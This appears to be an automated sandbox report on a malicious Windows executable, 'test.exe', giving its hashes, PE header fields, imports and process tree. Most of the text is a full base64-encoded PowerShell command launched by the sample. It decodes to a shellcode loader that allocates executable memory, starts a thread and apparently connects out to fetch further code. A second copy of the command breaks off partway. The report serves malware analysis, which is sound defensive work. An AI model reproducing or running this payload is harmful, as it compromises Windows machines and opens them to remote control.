File name: | test.exe |
Full analysis: | https://app.any.run/tasks/d33f4ad3-2d61-4cd7-942b-ce60bab64ad4 |
Verdict: | Malicious activity |
Threats: | Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. |
Analysis date: | September 30, 2020, 08:44:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed |
MD5: | 94F0812E3BF0C6640505A2DE15C92A75 |
SHA1: | 78ED1C2C5FF82C6C8F4B4AE8C91D650E97E9ADE5 |
SHA256: | D8EF1DD5869E6DCD3F34F7E5595D4FB42C57113FB0BDB860BE703C39A89A22BA |
SSDEEP: | 768:Pl3lWdUM4FXYpaCLnbcuyD7UEOkg6qZPtgM/ARwB3VBKt:plYUM4KLnouy8EOkg6qZFkiBG |
.exe | | | UPX compressed Win32 Executable (64.1) |
---|---|---|
.dll | | | Win32 Dynamic Link Library (generic) (15.5) |
.exe | | | Win32 Executable (generic) (10.6) |
.exe | | | Generic Win/DOS Executable (4.7) |
.exe | | | DOS Executable Generic (4.7) |
Subsystem: | Windows GUI |
---|---|
SubsystemVersion: | 4 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0xd570 |
UninitializedDataSize: | 36864 |
InitializedDataSize: | 4096 |
CodeSize: | 20480 |
LinkerVersion: | 2.5 |
PEType: | PE32 |
TimeStamp: | 2018:03:21 11:26:43+01:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 21-Mar-2018 10:26:43 |
Detected languages: |
|
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000080 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 3 |
Time date stamp: | 21-Mar-2018 10:26:43 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
UPX0 | 0x00001000 | 0x00009000 | 0x00000000 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0 |
UPX1 | 0x0000A000 | 0x00005000 | 0x00004200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 7.84458 |
.rsrc | 0x0000F000 | 0x00001000 | 0x00000600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 5.08138 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 4.8674 | 874 | UNKNOWN | English - United States | RT_MANIFEST |
COMCTL32.DLL |
GDI32.DLL |
KERNEL32.DLL |
MSVCRT.dll |
OLE32.DLL |
SHELL32.DLL |
SHLWAPI.DLL |
USER32.DLL |
WINMM.DLL |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3176 | "C:\Users\admin\AppData\Local\Temp\test.exe" | C:\Users\admin\AppData\Local\Temp\test.exe | — | explorer.exe |
User: admin Integrity Level: MEDIUM Exit code: 3221226540 | ||||
3496 | "C:\Users\admin\AppData\Local\Temp\test.exe" | C:\Users\admin\AppData\Local\Temp\test.exe | explorer.exe | |
User: admin Integrity Level: HIGH Exit code: 0 | ||||
2760 | "C:\Windows\system32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\1\BF0B.tmp.bat C:\Users\admin\AppData\Local\Temp\test.exe" | C:\Windows\system32\cmd.exe | — | test.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3876 | powershell /w 1 /C "sv GI -;sv Ez ec;sv Ll ((gv GI).value.toString()+(gv Ez).value.toString());powershell (gv Ll).value.toString() ('JABxAE0APQAnACQATgBuAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZAAiACsAIgBsACIAKwAiAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAIgArACIAbAAiACsAIgBsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABrAGIAYQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAbwBkAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGQAMgAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAOAAsAH0AMQA4ACwAfQA1ADAALAB9ADgAYgAsAH0ANQA4ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AOABiACwAfQAzADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADYALAB9ADMAMQAsAH0AZgBmACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQAwAGQALAB9ADMAYgAsAH0AMABmACwAfQBiADkALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADQAMwAsAH0AMQA5ACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABhACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0AZQA4ACwAfQA2ADcALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0AMAAwACwAfQA2AGEALAB9ADAANAA'+'sAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAyACwAfQBkADkALAB9AGMAOAAsAH0ANQBmACwAfQBmAGYALAB9AGQANQAsAH0AOAAzACwAfQBmADgALAB9ADAAMAAsAH0ANwBlACwAfQAzADYALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZAAsAH0AMgA4ACwAfQA1ADgALAB9ADYAOAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADAAYgAsAH0AMgBmACwAfQAwAGYALAB9ADMAMAAsAH0AZgBmACwAfQBkADUALAB9ADUANwAsAH0ANgA4ACwAfQA3ADUALAB9ADYAZQAsAH0ANABkACwAfQA2ADEALAB9AGYAZgAsAH0AZAA1ACwAfQA1AGUALAB9ADUAZQAsAH0AZgBmACwAfQAwAGMALAB9ADIANAAsAH0AMABmACwAfQA4ADUALAB9ADcAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AZQA5ACwAfQA5AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBjADEALAB9AGMAMwAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAEoAVAA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQATgBuACAALQBOAGEAbQBlACAAIgBBAHUAIgAgAC0AbgBhAG0AZQBzACAARABYAFYAOwAkAEoAVAA9ACQASgBUAC4AcgBlAHAAbABhAGMAZQAoACIARABYAFYAIgAsACAAIgBXAGkAbgAzADIARgB1AG4AYwB0AGkAIgArACIAbwAiACsAIgBuAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQAbwBkACAAPQAgACQAbwBkAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgB5AEUAUQB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAHkARQBRACIALAAgACIAMAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJABFAEgAPQAwAHgAMQAwADAANgA7AGkAZgAgACgAJABvAGQALgBMACAALQBnAHQAIAAwAHgAMQAwADAANgApAHsAJABFAEgAPQAkAG8AZAAuAEwAfQA7ACQAeQBVAD0AJABKAFQAOgA6AGMAYQBsAGwAbwBjACgAMAB4ADEAMAAwADYALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQAkAGsAYgBhACAAPQAgADAAOwBmAG8AcgAoACQASAB5AD0AMAA7ACQASAB5ACAALQBsAGUAKAAkAG8AZAAuAEwAZQBuAGcAdABoAC0AMQApADsAJABIAHkAKwArACkAewAkAEoAVAA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHkAVQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABIAHkAKQAsACAAJABvAGQAWwAkAEgAeQBdACwAIAAxACkAfQA7ACQASgBUADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAHkAVQAsACAAMAB4ADEAMAAwADYALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAGsAYgBhACkAOwAkAGQAbQBPAD0AWwBpAG4AdABdADAAeAAwADAAOwAkAEoAVAA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABbAHUAaQBuAHQAMwAyAF0AWwBpAG4AdABdADAALAAkAGQAbQBPACwAJAB5AFUALAAwACwAMAAsADAAKQA7ACcAOwAkAEcATwA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcQBNACkAKQA7ACQATAB3AD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACIAOwAkAG4ASAA9ACIAVwBpAG4AZABvAHcAcwAiADsAJABTAFkAcQAgAD0AIAAiAEMAOgBcACQAbgBIAFwARAB4AGkAegBXAHYAagBhAFwAJABuAEgAJABMAHcAXAB2ADEALgAwAFwAJABMAHcAIgA7ACQAUwBZAHEAIAA9ACAAJABTAFkAcQAuAHIAZQBwAGwAYQBjAGUAKAAiAEQAeABpAHoAIgAsACAAIgBzAHkAcwAiACkAOwAkAFMAWQBxACAAPQAgACQAUwBZAHEALgByAGUAcABsAGEAYwBlACgAIgBXAHYAagBhACIALAAgACIAdwBvAHcANgA0ACIAKQA7ACQAVwB5AHgAIAA9ACAAJwBUAHIAIgArACIAdQAiACsAIgBlACcAOwBpAGYAKABbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBJAHMANgA0AEIAaQB0AE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACAALQBlAHEAIAAnACQAVwB5AHgAJwApAHsAJABMAHcAPQAgACQAUwBZAHEAfQA7ACQAWgBDAD0AIgAgACQATAB3ACAAVgBaAGcASgAgACQARwBPACIAOwAkAFoAQwA9ACQAWgBDAC4AcgBlAHAAbABhAGMAZQAoACIAVgBaAGcASgAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAFoAQwA=')" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2268 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABxAE0APQAnACQATgBuAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZAAiACsAIgBsACIAKwAiAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAIgArACIAbAAiACsAIgBsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABrAGIAYQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAbwBkAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGQAMgAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAOAAsAH0AMQA4ACwAfQA1ADAALAB9ADgAYgAsAH0ANQA4ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AOABiACwAfQAzADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADYALAB9ADMAMQAsAH0AZgBmACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQAwAGQALAB9ADMAYgAsAH0AMABmACwAfQBiADkALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADQAMwAsAH0AMQA5ACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABhACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0AZQA4ACwAfQA2ADcALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0AMAAwACwAfQA2AGEALAB9ADAANAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAyACwAfQBkADkALAB9AGMAOAAsAH0ANQBmACwAfQBmAGYALAB9AGQANQAsAH0AOAAzACwAfQBmADgALAB9ADAAMAAsAH0ANwBlACwAfQAzADYALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZAAsAH0AMgA4ACwAfQA1ADgALAB9ADYAOAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADAAYgAsAH0AMgBmACwAfQAwAGYALAB9ADMAMAAsAH0AZgBmACwAfQBkADUALAB9ADUANwAsAH0ANgA4ACwAfQA3ADUALAB9ADYAZQAsAH0ANABkACwAfQA2ADEALAB9AGYAZgAsAH0AZAA1ACwAfQA1AGUALAB9ADUAZQAsAH0AZgBmACwAfQAwAGMALAB9ADIANAAsAH0AMABmACwAfQA4ADUALAB9ADcAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AZQA5ACwAfQA5AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBjADEALAB9AGMAMwAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAEoAVAA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQATgBuACAALQBOAGEAbQBlACAAIgBBAHUAIgAgAC0AbgBhAG0AZQBzACAARABYAFYAOwAkAEoAVAA9ACQASgBUAC4AcgBlAHAAbABhAGMAZQAoACIARABYAFYAIgAsACAAIgBXAGkAbgAzADIARgB1AG4AYwB0AGkAIgArACIAbwAiACsAIgBuAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQAbwBkACAAPQAgACQAbwBkAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgB5AEUAUQB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAHkARQBRACIALAAgACIAMAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJABFAEgAPQAwAHgAMQAwADAANgA7AGkAZgAgACgAJABvAGQALgBMACAALQBnAHQAIAAwAHgAMQAwADAANgApAHsAJABFAEgAPQAkAG8AZAAuAEwAfQA7ACQAeQBVAD0AJABKAFQAOgA6AGMAYQBsAGwAbwBjACgAMAB4ADEAMAAwADYALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQAkAGsAYgBhACAAPQAgADAAOwBmA